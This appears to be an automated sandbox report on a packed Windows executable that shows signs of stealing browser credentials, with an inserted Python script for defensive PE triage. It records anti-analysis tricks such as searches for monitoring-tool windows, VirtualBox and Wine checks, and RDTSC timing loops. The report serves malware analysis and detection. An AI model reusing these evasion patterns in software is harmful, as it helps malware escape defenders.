              Source: file.exe, 00000000.00000003.2211890707.0000000005911000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199613989.0000000005916000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.00000000058F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211982520.0000000005907000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exe | ReversingLabs: Detection: 36%
              Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll (10 load events)
              Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
              Source: file.exe | Static file information: File size 2958848 > 1048576
              Source: file.exe | Static PE information: Raw size of lvdvpuxj is bigger than: 0x100000 < 0x2a6c00

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W;lvdvpuxj:EW;foyvnwhq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lvdvpuxj:EW;foyvnwhq:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x2dc965 should be: 0x2d83a0
              Source: file.exe | Static PE information: section name: (unprintable section name)
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name: lvdvpuxj
              Source: file.exe | Static PE information: section name: foyvnwhq
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FA9EFF push eax; ret 0_3_00FA9FF1 (9 identical hits)
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_058EDD6D push ss; iretd 0_3_058EDD84 (2 identical hits)
              Source: file.exe | Static PE information: section name: (unprintable section name) entropy: 7.9797333055518855
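The static findings above (a section whose name is not printable, custom section names, a section with entropy 7.98 and ZLIB complexity 0.998, an entry point inside .taggant rather than a code section, and a stored checksum that does not match the file) are the cheap checks a packed binary trips. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code, that reproduces those checks with the standard library alone: it walks the section table, computes Shannon entropy per section, finds the section that owns AddressOfEntryPoint and recomputes the PE CheckSum. The PE32 it inspects is built inline as a stand-in; its section names, bytes and bogus checksum are constructed for the demo and are not values taken from the sample.

```python
"""Static PE triage of the kind the report above records: odd section names,
per-section entropy, the section that owns the entry point, and the CheckSum.
Standard library only; the PE32 it inspects is constructed inline (see build_demo_pe)."""
import math
import struct

STANDARD_SECTIONS = {b".text", b".data", b".rdata", b".bss", b".idata", b".edata",
                     b".rsrc", b".reloc", b".tls", b".pdata", b".CRT"}
FILE_ALIGN, SECTION_ALIGN = 0x200, 0x1000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, 8.0 when all 256 values are equally common."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """CheckSum as ImageHlp computes it: the file folded into a 16-bit sum,
    skipping the CheckSum dword itself, plus the file length."""
    padded = image + b"\0" * (-len(image) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(image)


def triage(image: bytes) -> dict:
    """Reproduce the report's static checks on one PE32 image."""
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections, = struct.unpack_from("<H", image, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", image, e_lfanew + 20)
    opt = e_lfanew + 24                                  # IMAGE_OPTIONAL_HEADER32
    entry_rva, = struct.unpack_from("<I", image, opt + 16)
    checksum_off = opt + 64
    stored, = struct.unpack_from("<I", image, checksum_off)
    sections, entry_section = [], None
    for i in range(nsections):                           # IMAGE_SECTION_HEADER table
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", image, opt + opt_size + 40 * i)
        name = raw_name.rstrip(b"\0")
        sections.append({"name": name.decode("latin-1"),
                         "entropy": round(shannon_entropy(image[rawptr:rawptr + rawsize]), 3),
                         "nonstandard_name": name not in STANDARD_SECTIONS,
                         "special_chars": not name or any(c <= 0x20 or c >= 0x7F for c in name)})
        if va <= entry_rva < va + max(vsize, rawsize):   # does this section own the entry point?
            entry_section = sections[-1]["name"]
    computed = pe_checksum(image, checksum_off)
    return {"sections": sections, "entry_section": entry_section,
            "entry_in_standard_section": entry_section is not None
            and entry_section.encode("latin-1") in STANDARD_SECTIONS,
            "checksum_stored": stored, "checksum_computed": computed,
            "checksum_ok": stored == computed}


def fix_checksum(image: bytes) -> bytes:
    """Copy of the image with CheckSum rewritten to the correct value."""
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    off, fixed = e_lfanew + 24 + 64, bytearray(image)
    struct.pack_into("<I", fixed, off, pe_checksum(image, off))
    return bytes(fixed)


def build_demo_pe() -> bytes:
    """Constructed stand-in, not the sample: a plain .text, a nameless section of
    uniformly distributed bytes (entropy 8.0, as packed data reads) and a custom-named
    section that owns the entry point, with a deliberately wrong CheckSum."""
    payloads = [  # (name, raw bytes, IMAGE_SCN_* characteristics); all made up for the demo
        (b".text", b"The quick brown fox jumps over the lazy dog. " * 40, 0x60000020),
        (b"", bytes(range(256)) * 16, 0xE0000040),
        (b"jkxnbmfa", b"\x60\x9C\xE8\x00\x00\x00\x00\x5B" * 8, 0xE0000020),
    ]
    align = lambda n, a: (n + a - 1) // a * a
    headers_len = align(0x40 + 4 + 20 + 0xE0 + 40 * len(payloads), FILE_ALIGN)
    image = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))  # e_lfanew = 0x40
    image += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)                                  # only the fields triage() reads are set
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, SECTION_ALIGN * len(payloads))  # entry point: last section
    struct.pack_into("<III", opt, 28, 0x400000, SECTION_ALIGN, FILE_ALIGN)
    struct.pack_into("<II", opt, 56, SECTION_ALIGN * (len(payloads) + 1), headers_len)
    struct.pack_into("<I", opt, 64, 0xBAADF00D)            # CheckSum: deliberately wrong
    image += opt
    raw_ptr, bodies = headers_len, b""
    for i, (name, body, flags) in enumerate(payloads):
        raw_size = align(len(body), FILE_ALIGN)
        image += struct.pack("<8sIIIIIIHHI", name, len(body), SECTION_ALIGN * (i + 1),
                             raw_size, raw_ptr, 0, 0, 0, 0, flags)
        bodies += body + b"\0" * (raw_size - len(body))
        raw_ptr += raw_size
    return bytes(image + b"\0" * (headers_len - len(image)) + bodies)
```

Call `triage(open(path, "rb").read())` on a real PE32 to get the same dictionary for it; `triage(build_demo_pe())` shows the three report findings on the constructed image (nameless and custom-named sections flagged, entry point outside every standard section, checksum mismatch), and `fix_checksum()` demonstrates that a correct value makes `checksum_ok` true, which is why a mismatch on a shipped binary indicates the header was rewritten after linking rather than a corrupt file.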

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (searched 2 times)
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (searched 3 times)
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass (searched 2 times)
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FEF04 second address: 6FEF1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FEF1E second address: 6FEF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87713B second address: 877144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 877144 second address: 877150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F92851B8946h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 877150 second address: 877156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 877156 second address: 877164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 877164 second address: 877197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9284AFDC97h 0x0000000b popad 0x0000000c popad 0x0000000d jnl 00007F9284AFDC9Fh 0x00000013 jmp 00007F9284AFDC8Bh 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 877197 second address: 87719D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8779E4 second address: 8779F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F9284AFDC86h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8779F2 second address: 8779FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8779FC second address: 877A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 877A02 second address: 877A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B055 second address: 87B059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B059 second address: 87B05F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B1F6 second address: 87B1FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B1FC second address: 87B240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F92851B894Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F92851B8959h 0x00000016 pop eax 0x00000017 mov edi, dword ptr [ebp+122D2BBCh] 0x0000001d lea ebx, dword ptr [ebp+1244FFAEh] 0x00000023 stc 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B240 second address: 87B258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B258 second address: 87B25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B25E second address: 87B262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B392 second address: 87B396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B396 second address: 87B39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B481 second address: 87B4C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F92851B8958h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add cx, 0CFFh 0x00000013 push 00000000h 0x00000015 xor edi, dword ptr [ebp+122D3D0Dh] 0x0000001b call 00007F92851B8949h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F92851B894Ch 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B4C6 second address: 87B51C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F9284AFDC86h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9284AFDC8Fh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push edx 0x00000019 jns 00007F9284AFDC8Ch 0x0000001f pop edx 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F9284AFDC99h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B51C second address: 87B521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B521 second address: 87B556 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov cl, D0h 0x0000000b push 00000003h 0x0000000d push 00000000h 0x0000000f ja 00007F9284AFDC87h 0x00000015 push 00000003h 0x00000017 mov ecx, dword ptr [ebp+122D3AB5h] 0x0000001d push AB576FC1h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9284AFDC8Fh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87B556 second address: 87B55A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86A790 second address: 86A79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86A79A second address: 86A7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F92851B8946h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89A420 second address: 89A428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89A74B second address: 89A751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89A751 second address: 89A770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F9284AFDC90h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnp 00007F9284AFDC86h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89A770 second address: 89A787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89A787 second address: 89A78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89A78D second address: 89A797 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F92851B8946h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89AA2B second address: 89AA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89AE60 second address: 89AE6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F92851B8946h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89AE6B second address: 89AE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 85EB0F second address: 85EB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89B2B5 second address: 89B2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89B2BB second address: 89B2FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8955h 0x00000007 jmp 00007F92851B8959h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F92851B894Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89B2FE second address: 89B302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89B890 second address: 89B896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89BB56 second address: 89BB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89BB5C second address: 89BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89BB60 second address: 89BB80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89BB80 second address: 89BBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jc 00007F92851B894Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jo 00007F92851B894Ch 0x0000001a jo 00007F92851B8946h 0x00000020 jmp 00007F92851B894Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89BBB3 second address: 89BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89BCC5 second address: 89BCD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F92851B8946h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89C035 second address: 89C03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89EF14 second address: 89EF19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D71A second address: 89D71E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D71E second address: 89D724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89D724 second address: 89D72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89F0EF second address: 89F0F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89F0F4 second address: 89F111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9284AFDC8Dh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A6483 second address: 8A6490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F92851B8952h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A6490 second address: 8A649A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A649A second address: 8A64A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A64A0 second address: 8A64A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A64A6 second address: 8A64AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8924AB second address: 8924AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B0A second address: 8A5B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B8959h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
